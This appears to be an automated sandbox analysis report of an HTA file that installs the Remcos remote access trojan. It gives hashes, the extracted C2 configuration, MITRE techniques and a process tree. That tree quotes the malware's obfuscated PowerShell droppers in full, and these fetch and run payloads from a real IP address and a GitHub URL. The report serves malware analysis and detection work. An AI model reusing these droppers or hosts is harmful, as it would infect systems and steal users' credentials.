remcos | c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2

Analysis

max time kernel
299s
max time network
273s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
17-10-2024 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

verynicegirlneedsuperkiisingfromtheboy.hta
Size

130KB
MD5

bfa06f35d87c1939017d70c204d3a7d5
SHA1

bb80945300d62122564399f088f09d1760172c20
SHA256

c6e6ef4d2a7c8dc43e114496de98a777e783cd554aa258736ef126ff8628d8c2
SHA512

04465026afe312e8fa1420d8341f57c2742c2ee4ccc57f65659b77d31cc6cfa084787f587114fa05b75d8b0fcee87d55d67e162fb75f3ec92c0e9f5c4a06b0fa
SSDEEP

96:Eam7SVApoWIApM8RM9vZnQ8vFYDJuPPxfiApohP7T:Ea2SVAqzAelZFYF3AEDT

Score

10^/10

remcos remotehost collection defense_evasion discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

exe.dropper

https://raw.githubusercontent.com/CryptersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg%20

Extracted

Family

remcos

Botnet

RemoteHost

idabo.duckdns.org:6875

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-0MWW62
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/4076-130-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/2392-135-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral2/memory/4028-129-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/4076-130-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/4028-129-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 3 IoCs

flow	pid	Process
22	348	PoWershELl.exE
25	3696	powershell.exe
27	3696	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2132	powershell.exe
3696	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
348	PoWershELl.exE
1404	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation	WScript.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
24	raw.githubusercontent.com
25	raw.githubusercontent.com

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 3696 set thread context of 3268	3696	powershell.exe	104
PID 3268 set thread context of 4028	3268	RegAsm.exe	110
PID 3268 set thread context of 4076	3268	RegAsm.exe	111
PID 3268 set thread context of 2392	3268	RegAsm.exe	112

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 12 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PoWershELl.exE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegAsm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	PoWershELl.exE

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
348	PoWershELl.exE
348	PoWershELl.exE
1404	powershell.exe
1404	powershell.exe
2132	powershell.exe
2132	powershell.exe
3696	powershell.exe
3696	powershell.exe
4028	RegAsm.exe
4028	RegAsm.exe
2392	RegAsm.exe
2392	RegAsm.exe
4028	RegAsm.exe
4028	RegAsm.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
3268	RegAsm.exe
3268	RegAsm.exe
3268	RegAsm.exe
3268	RegAsm.exe
3268	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	348	PoWershELl.exE
Token: SeDebugPrivilege	1404	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	2392	RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3268	RegAsm.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 4544 wrote to memory of 348	4544	mshta.exe	85
PID 4544 wrote to memory of 348	4544	mshta.exe	85
PID 4544 wrote to memory of 348	4544	mshta.exe	85
PID 348 wrote to memory of 1404	348	PoWershELl.exE	89
PID 348 wrote to memory of 1404	348	PoWershELl.exE	89
PID 348 wrote to memory of 1404	348	PoWershELl.exE	89
PID 348 wrote to memory of 3024	348	PoWershELl.exE	92
PID 348 wrote to memory of 3024	348	PoWershELl.exE	92
PID 348 wrote to memory of 3024	348	PoWershELl.exE	92
PID 3024 wrote to memory of 4956	3024	csc.exe	93
PID 3024 wrote to memory of 4956	3024	csc.exe	93
PID 3024 wrote to memory of 4956	3024	csc.exe	93
PID 348 wrote to memory of 4996	348	PoWershELl.exE	98
PID 348 wrote to memory of 4996	348	PoWershELl.exE	98
PID 348 wrote to memory of 4996	348	PoWershELl.exE	98
PID 4996 wrote to memory of 2132	4996	WScript.exe	99
PID 4996 wrote to memory of 2132	4996	WScript.exe	99
PID 4996 wrote to memory of 2132	4996	WScript.exe	99
PID 2132 wrote to memory of 3696	2132	powershell.exe	101
PID 2132 wrote to memory of 3696	2132	powershell.exe	101
PID 2132 wrote to memory of 3696	2132	powershell.exe	101
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3696 wrote to memory of 3268	3696	powershell.exe	104
PID 3268 wrote to memory of 2456	3268	RegAsm.exe	108
PID 3268 wrote to memory of 2456	3268	RegAsm.exe	108
PID 3268 wrote to memory of 2456	3268	RegAsm.exe	108
PID 3268 wrote to memory of 3976	3268	RegAsm.exe	109
PID 3268 wrote to memory of 3976	3268	RegAsm.exe	109
PID 3268 wrote to memory of 3976	3268	RegAsm.exe	109
PID 3268 wrote to memory of 4028	3268	RegAsm.exe	110
PID 3268 wrote to memory of 4028	3268	RegAsm.exe	110
PID 3268 wrote to memory of 4028	3268	RegAsm.exe	110
PID 3268 wrote to memory of 4028	3268	RegAsm.exe	110
PID 3268 wrote to memory of 4076	3268	RegAsm.exe	111
PID 3268 wrote to memory of 4076	3268	RegAsm.exe	111
PID 3268 wrote to memory of 4076	3268	RegAsm.exe	111
PID 3268 wrote to memory of 4076	3268	RegAsm.exe	111
PID 3268 wrote to memory of 2392	3268	RegAsm.exe	112
PID 3268 wrote to memory of 2392	3268	RegAsm.exe	112
PID 3268 wrote to memory of 2392	3268	RegAsm.exe	112
PID 3268 wrote to memory of 2392	3268	RegAsm.exe	112

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\verynicegirlneedsuperkiisingfromtheboy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4544
- C:\Windows\SysWOW64\WINDOwsPowERshElL\V1.0\PoWershELl.exE
  "C:\Windows\SYStEM32\WINDOwsPowERshElL\V1.0\PoWershELl.exE" "PoweRShell -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe ; ieX($(iEX('[sySTeM.texT.encODIng]'+[cHAr]0x3a+[cHAR]58+'Utf8.GeTstRING([SystEm.CONVERT]'+[CHaR]58+[chAr]0x3A+'fROMBase64STRInG('+[ChaR]0x22+'JHJWalU4b2hIMmVuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJFcmRFZkluaVRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTWJUbE9NRkksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBELHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV2hDLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdNSSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJzdWN3aUZLTkQiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZXNwQWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBGSmZiakxZUlcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRyVmpVOG9oSDJlbjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjIyMC40MC85OTA5L25pY2VwaWN0dXJld2l0aGhlcmxpcHNvbnRoZWxpcHN0aWN3aXRoaGVyLnRpRiIsIiRlTnY6QVBQREFUQVxuaWNlcGljdHVyZXdpdGhoZXJsaXBzb250aGVsaXBzdGljd2l0aGhlci52YlMiLDAsMCk7U1RBUnQtU0xlRVAoMyk7U1RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcbmljZXBpY3R1cmV3aXRoaGVybGlwc29udGhlbGlwc3RpY3dpdGhoZXIudmJTIg=='+[cHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:348
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPAsS -NoP -w 1 -C DeVIcecrEdEntiAldepLoYMent.eXe
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\umxbhhqp\umxbhhqp.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E48.tmp" "c:\Users\Admin\AppData\Local\Temp\umxbhhqp\CSC81D2B305399C45119F32DEABE4DB5F30.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4956
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4996
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'aW52b2tlLWV4cHJlU1NJb24oKCgnezF9aW1hZ2VVcmwgPSB7MH1odHRwczovL3Jhdy5naXRodWJ1c2VyY29udGUnKydudC5jb20vQ3J5cHQnKydlcnNBbmRUb29sc09maWNpYWwvWklQL3JlZnMvaGVhZHMvbWFpbi9EZXRhaE5vdGVfVi5qcGcnKycgezB9JysnO3sxfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk4nKydldCcrJy5XZWJDbGllbnQ7ezF9aW1hZ2VCeXRlcyA9IHsxfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezF9aW1hZ2VVcmwpO3sxfWltYWdlVGV4dCA9IFtTeXN0ZW0uJysnVGV4dC5FbmNvZGknKyduZ106OlVURicrJzguR2V0UycrJ3RyaW5nKHsxfWltYWdlQnl0ZXMpO3sxfXN0YXJ0RmxhZyA9IHsnKycwJysnfTw8QkFTRTY0X1NUQVJUPj57MH07ezEnKyd9ZW5kRmxhZyA9IHswfTw8QkFTRTY0X0VORD4+ezB9O3sxJysnfXN0YXJ0SW5kZXggPSB7MX1pbWFnZVRleHQuSW5kZXhPZih7MScrJ31zdGFydEZsYWcpO3sxfScrJ2VuZEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9ZW5kRmxhZyk7ezF9c3RhcnRJbmRleCAtZ2UgMCAtYW5kIHsxfWVuZEluZGV4IC1ndCB7MX1zdGFydEluZGV4O3sxfXN0YXJ0SW5kZXggKz0gezF9c3RhcnRGbGFnLkxlbmd0aDt7MX1iYXNlNjRMZW5ndGggPSB7MX1lbmRJbmRleCAtIHsxfXN0YXJ0SW5kJysnZXg7ezF9YmFzZTY0Q29tbWFuZCA9IHsxfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezF9c3RhcnRJbmRleCwgezF9YmFzZTY0JysnTGVuZ3RoKTt7MX1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTYnKyc0U3RyaW5nJysnKHsxfWJhc2U2JysnNENvbW1hbicrJ2QpO3sxfWxvYWRlZEFzc2VtYmx5ID0gW1MnKyd5c3RlbScrJy5SZWZsJysnZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCh7MX1jb21tYW5kQnl0ZXMpO3sxfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoezB9VkFJezB9KTt7MX12YWlNZXRob2QuSW52b2tlKHsxfW51bCcrJ2wsIEAoezB9dHh0LkZDQ0VSUi85MDk5LzA0JysnLjAyMi4zLjI5MS8vOnB0dGh7MH0sIHswfWRlc2F0aXZhJysnZG97MH0sIHswfWQnKydlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZCcrJ2VzYXRpdmFkb3swfSkpOycpLUZbY2hBUl0zOSxbY2hBUl0zNikgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2132
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "invoke-expreSSIon((('{1}imageUrl = {0}https://raw.githubuserconte'+'nt.com/Crypt'+'ersAndToolsOficial/ZIP/refs/heads/main/DetahNote_V.jpg'+' {0}'+';{1}webClient = New-Object System.N'+'et'+'.WebClient;{1}imageBytes = {1}webClient.DownloadData({1}imageUrl);{1}imageText = [System.'+'Text.Encodi'+'ng]::UTF'+'8.GetS'+'tring({1}imageBytes);{1}startFlag = {'+'0'+'}<<BASE64_START>>{0};{1'+'}endFlag = {0}<<BASE64_END>>{0};{1'+'}startIndex = {1}imageText.IndexOf({1'+'}startFlag);{1}'+'endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startInd'+'ex;{1}base64Command = {1}im'+'ageText.Substring({1}startIndex, {1}base64'+'Length);{1}commandBytes = [System.Convert]::FromBase6'+'4String'+'({1}base6'+'4Comman'+'d);{1}loadedAssembly = [S'+'ystem'+'.Refl'+'ection.Assembly]::Load({1}commandBytes);{1}vaiMethod = [dnlib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}nul'+'l, @({0}txt.FCCERR/9099/04'+'.022.3.291//:ptth{0}, {0}desativa'+'do{0}, {0}d'+'esativado{0}, {0}desativado{0}, {0}RegAsm{0}, {0}desativado{0}, {0}d'+'esativado{0}));')-F[chAR]39,[chAR]36) )"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3696
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:3268
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nlwkgxoktmmwzwhcjntsialoobwtieoc"
        7⤵
        
        PID:2456
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nlwkgxoktmmwzwhcjntsialoobwtieoc"
        7⤵
        
        PID:3976
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\nlwkgxoktmmwzwhcjntsialoobwtieoc"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4028
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\xnkd"
        7⤵
        Accesses Microsoft Outlook accounts
        System Location Discovery: System Language Discovery
        
        PID:4076
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ahpohijf"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2392

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
102B

MD5
8b08673f17145bb42a12afb88284f901

SHA1
e691c7763f5a6ce9ea8757a57011b4096c3f3bf5

SHA256
f58d88e39ebc963daeae5e3c6bbf29d6b36722db4eadf4dc48e0c98aabd17cfa

SHA512
709b957b99b08e8fec1cf427ba8efc8f2fc1d0a4f2f3ed96bbf62e0ab100ee6bc0c4af1b08fd082af6aba0b6a390b6643263682be22160b11ddc50711c36adef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PoWershELl.exE.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
af052ec49bc6c37150cba4d9f3b60458

SHA1
7f8e8babc74377c9ce5700f202d23d70750a336b

SHA256
a05ddc4c5337fcbbebacef47c4d5616a45a731cc59841b8a100c71a0fa36640e

SHA512
6f6cffc39798cc3cd5fc9a4595da836bc8d1c0f60f22b54ef8d73f56fa5943352d008a2d7e727eb424c0ae2a6b59745c4bf2d1e2dec078025e8e62c4f2ac054b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7abec6cf86a032010ccb192aa10831fb

SHA1
244cbf41a2fcd09bf16944a13afa729432f73b38

SHA256
d5a4a99877b3613880125a997f771a70fb41ee5ff3a0961e7dd95d427d742e34

SHA512
176d9d0021dc10faa3f1001ed3db4fb081592b9c1ffd0a21363c9db8444bf8f9c24e3b4d8569779ebaf7fab2081ad281bb2fa6f411a4593bd2b7febf71427c37

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES7E48.tmp

Filesize
1KB

MD5
c9529ec358f2cbffb1a030010d62ba5e

SHA1
df068f86b6cc17a7a3a6c510265bde4b17c8505e

SHA256
708f51064cab598461a5ca859bb2a1df78fd1591543a38be388387e34930d032

SHA512
71e2bef9bd0550f37e0d3456806cfa239417707b15cde8061f7efa5663ca3d3dd53d7049827a8ae9ed12b41c3ed718632c24397664f0fbe6c7835b5f8b5107e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gys51n3m.jto.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nlwkgxoktmmwzwhcjntsialoobwtieoc

Filesize
4KB

MD5
79f35c7500a5cc739c1974804710441f

SHA1
24fdf1fa45049fc1a83925c45357bc3058bad060

SHA256
897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4

SHA512
03281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e

Download Submit
C:\Users\Admin\AppData\Local\Temp\umxbhhqp\umxbhhqp.dll

Filesize
3KB

MD5
081a2b2d7416a2cc4d6b0a94b19f2ecd

SHA1
62159c3a93146ea24197f0602082ecd7c863883e

SHA256
aac93ad1d544b9122556937fd9d0af119d3459f52eb411295545ba5f6a75b533

SHA512
4e4097d0986e62a7e361a5024cf9149714068d574b1c19125dbd525b66faf33222e71c1ae28e2947e7cd18ec916f6a7e7fdab20eb51c22fed5f8215e22475f8b

Download Submit
C:\Users\Admin\AppData\Roaming\nicepicturewithherlipsonthelipsticwithher.vbS

Filesize
190KB

MD5
2a9ee6d8ccd6eb9798a180e0e92c889c

SHA1
7871c7bfb07c278debbe50d3eff2b372918973e0

SHA256
56ba91564c0cdf1671dc0ebcd1c1323553627cd5f5e7622a1b66823e5e950650

SHA512
e5ada7fe9381706a7890d48a4b564e766030cca0e109c77a74e54354c390fe2d3981574a8ebed2d7e800148ba6cd245af4c11a4a0c105f56d6e19cdb89905e71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\umxbhhqp\CSC81D2B305399C45119F32DEABE4DB5F30.TMP

Filesize
652B

MD5
86a5172711c6d131471f7a86f276b902

SHA1
fd65cfcba6131755b918ac2ad7ec9f6ee55f2323

SHA256
3e43f8057d96c5c733923ccfcc1371bb695c438dabdf1911c1fc24fc55efcff5

SHA512
665b43f9b4a516821fc5cbe937321bf0e5d0d2cd789b0c0ecd3d6d5251031303b9aadabc8a82fe372253b28977759de8406aef84b25538587f32e4dfd0b0225e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\umxbhhqp\umxbhhqp.0.cs

Filesize
463B

MD5
ef1a52e62eb8136f57673b29cba789f5

SHA1
5d35e639e96c2d15d383b03ec1cbe89efd8ee75e

SHA256
dcf176d49fc46c4c6441a96381c4e85cd8af1b43a1468e05872538ed8c1f3584

SHA512
ad531d19065b816a6aa92a235ad89162bc68c256cce64859c1ba75ef72c4bd5343377fee478d019b2010d7defec7921aa96f84c0a75a1d66737de0735e9f0139

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\umxbhhqp\umxbhhqp.cmdline

Filesize
369B

MD5
8f820e62133707fad380bd12debca616

SHA1
92e9b529e9f214f8e050cd0a8e1771f3d8aa64ce

SHA256
0e631c204a18923605e3fad4ee5a90669a0da16c81198763030f21641ed01ede

SHA512
197cb5fc5d4937921a9dc9587b5a31d27a46bb5f95fe54b3aae4328acf404b85fd042e79bc00248f803413c61920ce07ebcfbd4fb1018dc034d6f2cdf4ce55b5

Download Submit
memory/348-7-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/348-73-0x0000000007120000-0x0000000007142000-memory.dmp

Filesize
136KB

Download
memory/348-18-0x0000000005D50000-0x0000000005D6E000-memory.dmp

Filesize
120KB

Download
memory/348-19-0x0000000005D80000-0x0000000005DCC000-memory.dmp

Filesize
304KB

Download
memory/348-0-0x0000000070E8E000-0x0000000070E8F000-memory.dmp

